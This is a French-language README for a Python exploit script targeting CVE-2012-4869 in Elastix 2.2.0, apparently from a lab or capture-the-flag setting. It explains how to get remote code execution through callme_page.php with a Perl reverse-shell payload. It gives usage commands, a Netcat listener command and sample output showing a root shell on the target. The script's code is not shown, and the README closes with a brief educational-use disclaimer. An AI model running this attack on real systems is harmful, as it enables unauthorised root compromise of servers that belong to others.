
Script d'exploitation Python pour la vulnérabilité LFI d'Elastix 2.2.0 (CVE-2012-4869) permettant l'exécution de code à distance via l'injection de payload de reverse shell en Perl.
Ce script exploite une vulnérabilité d'inclusion de fichier local (LFI) dans Elastix 2.2.0, permettant une exécution de code à distance (RCE) en injectant des commandes via le point de terminaison callme_page.php. L'exploit est basé sur CVE-2012-4869.
requestsInstallez les dépendances avec :
pip install requests
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001
Avant d'exécuter l'exploit, démarrez un listener Netcat sur votre machine :
nc -lvnp 9001
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001
[+] Exploit sent successfully, waiting for reverse shell...
[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)
Cet exploit est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. L'utilisation non autorisée est illégale. L'auteur n'est pas responsable d'une mauvaise utilisation de cet outil.